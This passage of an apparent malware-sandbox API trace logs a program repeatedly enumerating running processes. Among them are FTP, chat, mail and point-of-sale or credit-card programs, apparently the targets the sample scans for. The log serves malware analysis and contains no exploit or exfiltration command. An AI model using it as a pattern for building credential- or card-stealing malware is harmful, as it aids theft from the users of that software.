th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0106.618] Process32NextW (in: hSnapshot=0x2b4, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0106.619] Process32NextW (in: hSnapshot=0x2b4, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x588, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x370, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0106.620] Process32NextW (in: hSnapshot=0x2b4, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="expense.exe")) returned 1 [0106.621] Process32NextW (in: hSnapshot=0x2b4, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="restructuring.exe")) returned 1 [0106.622] Process32NextW (in: hSnapshot=0x2b4, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x730, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="seem.exe")) returned 1 [0106.623] Process32NextW (in: hSnapshot=0x2b4, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x78c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="und-rica.exe")) returned 1 [0106.624] Process32NextW (in: hSnapshot=0x2b4, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x60c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="fighters.exe")) returned 1 [0106.625] Process32NextW (in: hSnapshot=0x2b4, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x20c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="dimensions flyer.exe")) returned 1 [0106.626] Process32NextW (in: hSnapshot=0x2b4, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x244, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="des.exe")) returned 1 [0106.627] Process32NextW (in: hSnapshot=0x2b4, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x364, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="casting.exe")) returned 1 [0106.628] Process32NextW (in: hSnapshot=0x2b4, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="morrison-consult.exe")) returned 1 [0106.688] Process32NextW (in: hSnapshot=0x2b4, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x48c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="targeted.exe")) returned 1 [0106.689] Process32NextW (in: hSnapshot=0x2b4, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="modify_vital_consider.exe")) returned 1 [0106.689] Process32NextW (in: hSnapshot=0x2b4, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x410, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="omega hiv.exe")) returned 1 [0106.690] Process32NextW (in: hSnapshot=0x2b4, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="strike_grid_ringtones.exe")) returned 1 [0106.691] Process32NextW (in: hSnapshot=0x2b4, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="reload.exe")) returned 1 [0106.691] Process32NextW (in: hSnapshot=0x2b4, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="inner_atomic.exe")) returned 1 [0106.692] Process32NextW (in: hSnapshot=0x2b4, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x774, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="box_toyota.exe")) returned 1 [0106.692] Process32NextW (in: hSnapshot=0x2b4, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="invited-pty-currencies.exe")) returned 1 [0106.693] Process32NextW (in: hSnapshot=0x2b4, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x700, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0106.694] Process32NextW (in: hSnapshot=0x2b4, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x738, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0106.694] Process32NextW (in: hSnapshot=0x2b4, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x620, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0106.695] Process32NextW (in: hSnapshot=0x2b4, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x570, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0106.696] Process32NextW (in: hSnapshot=0x2b4, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x31c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0106.696] Process32NextW (in: hSnapshot=0x2b4, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0106.697] Process32NextW (in: hSnapshot=0x2b4, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0106.698] Process32NextW (in: hSnapshot=0x2b4, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0106.699] Process32NextW (in: hSnapshot=0x2b4, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x51c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0106.700] Process32NextW (in: hSnapshot=0x2b4, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0106.701] Process32NextW (in: hSnapshot=0x2b4, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x304, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0106.702] Process32NextW (in: hSnapshot=0x2b4, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0106.703] Process32NextW (in: hSnapshot=0x2b4, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x694, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0106.704] Process32NextW (in: hSnapshot=0x2b4, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0106.705] Process32NextW (in: hSnapshot=0x2b4, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0106.706] Process32NextW (in: hSnapshot=0x2b4, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0106.706] Process32NextW (in: hSnapshot=0x2b4, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x80c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0106.707] Process32NextW (in: hSnapshot=0x2b4, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x82c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0106.709] Process32NextW (in: hSnapshot=0x2b4, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x83c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0106.710] Process32NextW (in: hSnapshot=0x2b4, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x84c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0106.711] Process32NextW (in: hSnapshot=0x2b4, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x85c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0106.713] Process32NextW (in: hSnapshot=0x2b4, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x87c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="totalcmd.exe")) returned 1 [0106.714] Process32NextW (in: hSnapshot=0x2b4, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x88c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0106.716] Process32NextW (in: hSnapshot=0x2b4, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x89c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0106.717] Process32NextW (in: hSnapshot=0x2b4, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0106.719] Process32NextW (in: hSnapshot=0x2b4, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0106.720] Process32NextW (in: hSnapshot=0x2b4, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0106.721] Process32NextW (in: hSnapshot=0x2b4, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0106.771] Process32NextW (in: hSnapshot=0x2b4, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0106.774] Process32NextW (in: hSnapshot=0x2b4, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0106.775] Process32NextW (in: hSnapshot=0x2b4, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x90c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0106.777] Process32NextW (in: hSnapshot=0x2b4, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x91c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0106.778] Process32NextW (in: hSnapshot=0x2b4, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0106.779] Process32NextW (in: hSnapshot=0x2b4, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x93c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0106.781] Process32NextW (in: hSnapshot=0x2b4, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x94c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0106.782] Process32NextW (in: hSnapshot=0x2b4, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x95c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0106.783] Process32NextW (in: hSnapshot=0x2b4, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x96c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0106.784] Process32NextW (in: hSnapshot=0x2b4, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x97c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0106.786] Process32NextW (in: hSnapshot=0x2b4, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x98c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0106.787] Process32NextW (in: hSnapshot=0x2b4, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x99c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0106.789] Process32NextW (in: hSnapshot=0x2b4, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0106.790] Process32NextW (in: hSnapshot=0x2b4, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0106.791] Process32NextW (in: hSnapshot=0x2b4, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="map enquiries.exe")) returned 1 [0106.792] Process32NextW (in: hSnapshot=0x2b4, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="scenic.exe")) returned 1 [0106.794] Process32NextW (in: hSnapshot=0x2b4, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="rider.exe")) returned 1 [0106.795] Process32NextW (in: hSnapshot=0x2b4, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0106.796] Process32NextW (in: hSnapshot=0x2b4, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0106.797] Process32NextW (in: hSnapshot=0x2b4, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0106.799] Process32NextW (in: hSnapshot=0x2b4, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xac4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="mhtop32bit.exe")) returned 1 [0106.800] Process32NextW (in: hSnapshot=0x2b4, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="VSSVC.exe")) returned 1 [0106.802] Process32NextW (in: hSnapshot=0x2b4, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0106.803] Process32NextW (in: hSnapshot=0x2b4, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xca0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0106.804] Process32NextW (in: hSnapshot=0x2b4, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0106.805] Process32NextW (in: hSnapshot=0x2b4, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0106.806] Process32NextW (in: hSnapshot=0x2b4, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0106.808] Process32NextW (in: hSnapshot=0x2b4, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0 [0106.809] CloseHandle (hObject=0x2b4) returned 1 [0106.809] GetCurrentThread () returned 0xfffffffe [0106.809] WaitForSingleObject (hHandle=0xfffffffe, dwMilliseconds=0x64) returned 0x102 [0106.965] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2f8 [0106.970] Process32FirstW (in: hSnapshot=0x2f8, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0106.970] Process32NextW (in: hSnapshot=0x2f8, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0106.971] Process32NextW (in: hSnapshot=0x2f8, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0106.972] Process32NextW (in: hSnapshot=0x2f8, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0106.973] Process32NextW (in: hSnapshot=0x2f8, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0106.974] Process32NextW (in: hSnapshot=0x2f8, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0106.975] Process32NextW (in: hSnapshot=0x2f8, lppe=0x8cfb04 | out: 